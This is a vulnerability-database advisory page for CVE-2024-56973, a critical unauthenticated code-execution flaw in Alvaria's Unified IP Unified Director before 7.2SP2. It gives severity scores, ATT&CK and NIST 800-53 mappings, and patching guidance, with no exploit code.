Cyber Posture

CVE-2024-56973

Critical

Published: 14 February 2025

Published
14 February 2025
Modified
15 April 2026
KEV Added
Patch
CVSS Score 9.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score 0.0057 68.6th percentile
Risk Priority 20 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2024-56973 is a critical-severity Improper Preservation of Permissions (CWE-281) vulnerability. Its CVSS base score is 9.8 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 31.4% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).

Threat & Defense at a Glance

What attackers do: exploitation maps to Exploit Public-Facing Application (T1190). What defenders deploy: see the NIST 800-53 controls recommended below.
Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)AI

AC-3 Access Enforcement good match
prevent

Enforces approved authorizations on the ProcessUploadFromURL.jsp component to prevent unauthorized remote access and arbitrary code execution via insecure permissions.

SI-2 Flaw Remediation good match
prevent

Requires timely identification, reporting, and correction of the specific flaw in versions prior to 7.2SP2, directly mitigating the vulnerability through patching.

SI-10 Information Input Validation good match
prevent

Validates the source and filename parameters in ProcessUploadFromURL.jsp to block malicious inputs that enable arbitrary code execution.

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
attack.mitre.org →
Why these techniques?

Direct RCE via unauthenticated upload/execution in public-facing JSP endpoint maps cleanly to exploitation of public-facing application.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

NVD Description

Insecure Permissions vulnerability in Alvaria, Inc Unified IP Unified Director before v.7.2SP2 allows a remote attacker to execute arbitrary code via the source and filename parameters to the ProcessUploadFromURL.jsp component.

Deeper analysisAI

CVE-2024-56973 is an Insecure Permissions vulnerability (CWE-281) affecting Alvaria, Inc's Unified IP Unified Director software in versions prior to 7.2SP2. The flaw resides in the ProcessUploadFromURL.jsp component, where inadequate permission controls on the source and filename parameters enable a remote attacker to execute arbitrary code. This issue carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), classifying it as critical due to its potential for severe impact across confidentiality, integrity, and availability.

A remote attacker requires no privileges, authentication, or user interaction to exploit this vulnerability over the network with low complexity. By crafting requests to the vulnerable ProcessUploadFromURL.jsp endpoint using the source and filename parameters, the attacker can upload and execute malicious code on the target system, potentially leading to full server compromise, data theft, or further lateral movement within the environment.

Mitigation involves upgrading to Unified IP Unified Director version 7.2SP2 or later, as earlier versions are explicitly vulnerable. Additional details, including potential proof-of-concept information, are available in the referenced advisories at https://gist.github.com/VAMorales/1092a29ac7d0b4b80d5c853b9a22a65d.

Details

CWE(s)
CWE-281

CVEs Like This One

CVE-2025-25871Shared CWE-281
CVE-2024-55507Shared CWE-281
CVE-2024-54818Shared CWE-281
CVE-2024-54879Shared CWE-281
CVE-2024-54880Shared CWE-281
CVE-2024-40672Shared CWE-281
CVE-2024-46622Shared CWE-281
CVE-2025-30456Shared CWE-281
CVE-2025-30449Shared CWE-281
CVE-2025-25711Shared CWE-281

References